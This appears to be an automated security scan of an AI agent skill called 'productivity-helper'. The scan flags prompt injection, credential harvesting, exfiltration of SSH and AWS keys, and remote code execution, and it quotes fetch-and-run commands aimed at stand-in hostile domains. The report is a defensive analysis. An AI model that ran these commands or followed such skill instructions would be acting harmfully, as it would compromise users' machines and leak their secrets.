The Agent Skills Directory

CRITICAL E004: Prompt injection detected in skill instructions.

Potential prompt injection detected (high risk: 1.00). The prompt includes multiple deceptive code snippets (external binary download, credential prompts and unencrypted exfiltration, reading SSH/AWS keys, base64-encoding sensitive data, and arbitrary shell execution) that are outside the stated productivity purpose and constitute hidden/malicious instructions.

HIGH W007: Insecure credential handling detected in skill instructions.

Insecure credential handling detected (high risk: 1.00). The prompt explicitly asks for user API keys and passwords and includes code that reads sensitive files (SSH keys, AWS credentials) and sends these values verbatim (including base64-encoded) to external endpoints, constituting direct secret exfiltration.

CRITICAL E005: Suspicious download URL detected in skill instructions.

Suspicious download URL detected (high risk: 1.00). Yes — all listed domains are obscure/untrusted, include direct links to binaries/scripts (.bin, .sh), use unencrypted HTTP endpoints for credential/data exfiltration, and appear explicitly used in malicious download and data-collection code, making them highly suspicious.

CRITICAL E006: Malicious code pattern detected in skill scripts.

Malicious code pattern detected (high risk: 1.00). The skill contains multiple explicit malicious behaviors — credential harvesting, unauthorized exfiltration of SSH/AWS credentials (base64-encoded), remote command execution, downloading and executing external binaries, and hidden eval/exec usage — consistent with deliberate backdoor/supply-chain malware.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

Third-party content exposure detected (high risk: 1.00). SKILL.md explicitly instructs fetching and executing external resources (e.g., curl https://unknown-domain.xyz/helper.sh, wget http://malicious-cdn.ml/tool.bin) and making POSTs to untrusted domains (data-collector.xyz, analytics-service.tk, stat-collector.info), so the agent will ingest and act on open third‑party content that can change runtime behavior.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

Potentially malicious external URL detected (high risk: 1.00). The skill explicitly downloads and executes remote binaries at runtime — e.g., curl https://unknown-domain.xyz/helper.sh (installed and executed during setup) and wget http://malicious-cdn.ml/tool.bin (downloaded and run in backgroundOptimization) — so external content is fetched and executed and is required, creating a direct high-risk code‑execution dependency.

MEDIUM W013: Attempt to modify system services in skill instructions.

Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt explicitly instructs downloading and executing external binaries, reading sensitive files (SSH keys, AWS creds), harvesting credentials, running arbitrary shell commands, and exfiltrating data—actions that directly compromise the machine's state and security.

productivity-helper